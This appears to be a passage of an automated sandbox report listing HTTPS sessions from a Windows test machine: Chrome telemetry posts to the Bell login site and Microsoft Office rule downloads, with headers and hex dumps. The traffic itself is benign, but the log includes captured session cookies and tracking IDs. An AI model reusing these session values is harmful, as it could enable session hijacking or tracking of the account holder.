                                                                                                                                                                                                                                                                                                                                      Cookie: BSCC=LoginSplashReturnURL=%2fLogin%3flanguage%3den; 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; CAD_Bell_ca_SS=967776428.47873.0000; Qjja3xkGs7=3789514188.64288.0000; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; TLP025e8c23=028702b9c92edae6af33052f2cad8391df3643e23d85a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c299bcfdedb4de1548e72df9a4d727dc04ff7a4434f043a9549e2ae990e27c8fffcf8c51f6f45ef28d16623df71e944530154bdbbc943f1778729d75c23d5090b564224b9da5206df5702a68a73781d1fd1ececbd44594c5dd8c5b5254f6f1bde1 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:04 UTC736OUTData Raw: 24 61 3d 31 25 37 43 34 25 37 43 5f 65 76 65 6e 74 5f 25 37 43 31 37 33 30 33 38 30 33 32 30 35 31 31 25 37 43 5f 73 72 5f 25 37 43 74 79 70 65 25 37 43 62 6f 6f 74 25 37 43 73 72 61 64 25 37 43 31 25 32 43 31 25 37 43 35 25 37 43 5f 65 76 65 6e 74 5f 25 37 43 31 37 33 30 33 38 30 33 32 31 36 31 35 25 37 43 5f 73 72 5f 25 37 43 74 79 70 65 25 37 43 63 6f 6e 66 25 37 43 6d 6f 64 75 6c 65 25 37 43 31 25 37 43 65 78 63 6c 75 64 65 64 25 37 43 31 25 37 43 73 72 73 72 25 37 43 36 35 30 30 30 25 37 43 76 73 6e 25 37 43 36 37 37 39 36 32 31 25 37 43 61 70 70 69 64 25 37 43 34 32 39 62 31 65 61 63 34 35 31 34 63 35 63 65 25 32 43 31 25 37 43 36 25 37 43 5f 65 76 65 6e 74 5f 25 37 43 31 37 33 30 33 38 30 33 32 31 36 31 35 25 37 43 5f 6e 6f 73 72 5f 25 37 43 72 25
                                                                                                                                                                                                                                                                                                                                      Data Ascii: $a=1%7C4%7C_event_%7C1730380320511%7C_sr_%7Ctype%7Cboot%7Csrad%7C1%2C1%7C5%7C_event_%7C1730380321615%7C_sr_%7Ctype%7Cconf%7Cmodule%7C1%7Cexcluded%7C1%7Csrsr%7C65000%7Cvsn%7C6779621%7Cappid%7C429b1eac4514c5ce%2C1%7C6%7C_event_%7C1730380321615%7C_nosr_%7Cr%
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:04 UTC2231INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                                                                                                      X-Generated-By: Q-BC036
                                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://mybell.bell.ca
                                                                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 1
                                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: frame-ancestors bell.ca *.bell.ca *.bellmts.ca *.virginmobile.ca *.virginplus.ca *.vm.ca *.vmobile.ca *.vmcanada.com *.thesource.ca *.luckymobile.ca *.decibelinsight.net *.decibel.com; script-src https://*.bazaarvoice.com https://*.luckymobile.ca https://www.googletagmanager.com https://sc-static.net https://assets.adobedtm.com https://*.google-analytics.com https://*.postescanada-canadapost.ca https://*.nuance.com https://*.inq.com https://connect.facebook.net https://static.ads-twitter.com https://*.twitter.com https://ssl.geoplugin.net https://s.pinimg.com https://*.google.com https://*.gstatic.com https://*.vmobile.ca https://*.googleadservices.com https://*.stackadapt.com https://*.doubleclick.net https://*.virginplus.ca https://*.bell.ca https://*.tiktok.com https://*.know-where.com https://*.korem.com https://*.googleapis.com https://*.coveo.com https://siteimproveanalytics.com https://*.licdn.com https://mybell-qc.akamaized.net https://mybell-on.akamaized.net https://vldbellsu [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:04 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Length: 121
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: TLP409c8162028=08e8c5f15aab20005aa4ba6df11aca23adbc279f49528208e67fdcf24317d98e5780748eea1b1a5a08ba08fb48113000d894c9c9d27d6971a024a83cda35edea7abe9e49a46ed793544dfc3005a2dd2f05e0fd36cb61ca81f9c35d0dd8aa966b; Path=/
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:04 UTC121INData Raw: 4f 4b 28 4f 41 29 7c 6e 61 6d 65 3d 72 75 78 69 74 61 67 65 6e 74 6a 73 7c 66 65 61 74 75 72 65 48 61 73 68 3d 49 43 41 37 4e 51 56 66 67 68 71 72 75 78 7c 76 65 72 73 69 6f 6e 3d 7c 62 75 69 6c 64 4e 75 6d 62 65 72 3d 31 30 32 39 39 32 34 31 30 30 31 30 38 34 31 34 30 7c 6c 61 73 74 4d 6f 64 69 66 69 63 61 74 69 6f 6e 3d 31 37 33 30 32 37 36 34 37 36 34 32 30
                                                                                                                                                                                                                                                                                                                                      Data Ascii: OK(OA)|name=ruxitagentjs|featureHash=ICA7NQVfghqrux|version=|buildNumber=10299241001084140|lastModification=1730276476420


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                      77192.168.2.949847206.47.98.2074433100C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:05 UTC3400OUTPOST /rb_bced360d-a02a-4b73-b0e7-46fe5ae1dc34?type=js3&sn=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0&svrid=8&flavor=post&vi=OSRWPKERGJKLBVFCIANBBATQHLJBBKCA-0&modifiedSince=1730276476420&rf=https%3A%2F%2Fmybell.bell.ca%2FLogin%3Flanguage%3Den&bp=3&app=429b1eac4514c5ce&crc=2219907894&en=gticcd0a&end=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Host: mybell.bell.ca
                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                      Content-Length: 435
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                      Origin: https://mybell.bell.ca
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                      Referer: https://mybell.bell.ca/Login?language=en
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                      Cookie: BSCC=LoginSplashReturnURL=%2fLogin%3flanguage%3den; 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; CAD_Bell_ca_SS=967776428.47873.0000; Qjja3xkGs7=3789514188.64288.0000; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; TLP025e8c23=028702b9c92edae6af33052f2cad8391df3643e23d85a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c299bcfdedb4de1548e72df9a4d727dc04ff7a4434f043a9549e2ae990e27c8fffcf8c51f6f45ef28d16623df71e944530154bdbbc943f1778729d75c23d5090b564224b9da5206df5702a68a73781d1fd1ececbd44594c5dd8c5b5254f6f1bde1 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:05 UTC435OUTData Raw: 24 61 3d 31 25 37 43 31 25 37 43 5f 6c 6f 61 64 5f 25 37 43 5f 6c 6f 61 64 5f 25 37 43 2d 25 37 43 31 37 33 30 33 38 30 33 31 31 33 36 37 25 37 43 30 25 37 43 64 6e 25 37 43 2d 31 25 37 43 73 76 74 72 67 25 37 43 31 25 37 43 73 76 6d 25 37 43 69 31 25 35 45 73 6b 30 25 35 45 73 68 30 24 50 56 3d 31 24 72 49 64 3d 52 49 44 5f 2d 31 33 31 33 37 39 37 35 35 24 72 70 49 64 3d 2d 31 38 34 37 33 30 33 32 38 30 24 6d 64 3d 6d 64 63 63 32 25 32 43 37 35 39 41 30 39 43 46 34 37 43 32 33 43 45 37 38 30 34 43 32 35 30 39 38 45 30 31 46 46 41 38 25 33 42 6d 64 63 63 37 25 32 43 6d 79 42 65 6c 6c 25 33 42 6d 64 63 63 32 30 25 32 43 31 2e 34 25 33 42 6d 64 63 63 32 31 25 32 43 33 67 24 75 72 6c 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 6d 79 62 65 6c 6c 2e 62 65 6c
                                                                                                                                                                                                                                                                                                                                      Data Ascii: $a=1%7C1%7C_load_%7C_load_%7C-%7C1730380311367%7C0%7Cdn%7C-1%7Csvtrg%7C1%7Csvm%7Ci1%5Esk0%5Esh0$PV=1$rId=RID_-131379755$rpId=-1847303280$md=mdcc2%2C759A09CF47C23CE7804C25098E01FFA8%3Bmdcc7%2CmyBell%3Bmdcc20%2C1.4%3Bmdcc21%2C3g$url=https%3A%2F%2Fmybell.bel
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:05 UTC2231INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                                                                                                      X-Generated-By: Q-BC036
                                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://mybell.bell.ca
                                                                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 1
                                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: frame-ancestors bell.ca *.bell.ca *.bellmts.ca *.virginmobile.ca *.virginplus.ca *.vm.ca *.vmobile.ca *.vmcanada.com *.thesource.ca *.luckymobile.ca *.decibelinsight.net *.decibel.com; script-src https://*.bazaarvoice.com https://*.luckymobile.ca https://www.googletagmanager.com https://sc-static.net https://assets.adobedtm.com https://*.google-analytics.com https://*.postescanada-canadapost.ca https://*.nuance.com https://*.inq.com https://connect.facebook.net https://static.ads-twitter.com https://*.twitter.com https://ssl.geoplugin.net https://s.pinimg.com https://*.google.com https://*.gstatic.com https://*.vmobile.ca https://*.googleadservices.com https://*.stackadapt.com https://*.doubleclick.net https://*.virginplus.ca https://*.bell.ca https://*.tiktok.com https://*.know-where.com https://*.korem.com https://*.googleapis.com https://*.coveo.com https://siteimproveanalytics.com https://*.licdn.com https://mybell-qc.akamaized.net https://mybell-on.akamaized.net https://vldbellsu [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:05 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Length: 121
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: TLP409c8162028=08e8c5f15aab20008aa6fc606b9098f118ebe7342792a6e5718367e72913b0b3b1978910c624e1f808d7c596161130004d0f820a98e25446314b5b9bb701a2f3ce1fa30cad5085f521b8b87063fc0e54826708331e6e900dfac6a17fe0819c18; Path=/
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:05 UTC121INData Raw: 4f 4b 28 4f 41 29 7c 6e 61 6d 65 3d 72 75 78 69 74 61 67 65 6e 74 6a 73 7c 66 65 61 74 75 72 65 48 61 73 68 3d 49 43 41 37 4e 51 56 66 67 68 71 72 75 78 7c 76 65 72 73 69 6f 6e 3d 7c 62 75 69 6c 64 4e 75 6d 62 65 72 3d 31 30 32 39 39 32 34 31 30 30 31 30 38 34 31 34 30 7c 6c 61 73 74 4d 6f 64 69 66 69 63 61 74 69 6f 6e 3d 31 37 33 30 32 37 36 34 37 36 34 32 30
                                                                                                                                                                                                                                                                                                                                      Data Ascii: OK(OA)|name=ruxitagentjs|featureHash=ICA7NQVfghqrux|version=|buildNumber=10299241001084140|lastModification=1730276476420


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      78192.168.2.94984813.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:05 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:05 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 407
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B9D30478D"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 151676fb-b01e-0084-4068-28d736000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131205Z-15b8d89586f989rkwt13xern5400000004v00000000093vs
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:05 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      79192.168.2.94984913.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:05 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:05 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 474
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB3F48DAE"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 055e5760-501e-00a0-45eb-289d9f000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131205Z-17c5cb586f6f8m6jnehy0z65x400000008v000000000csbf
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:05 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      80192.168.2.94985013.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:05 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:05 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 408
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB9B6040B"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: e138989b-f01e-003f-497f-2ad19d000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131205Z-17c5cb586f6f8m6jnehy0z65x400000008u000000000ee7f
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:05 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      81192.168.2.94985113.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:05 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:05 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 469
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB3CAEBB8"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 1d33856d-201e-000c-0612-2979c4000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131205Z-17c5cb586f6r59nt4rzfbx40ys00000001t000000000a4ra
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:05 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      82192.168.2.94985213.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:05 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:05 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:05 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 416
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB5284CCE"
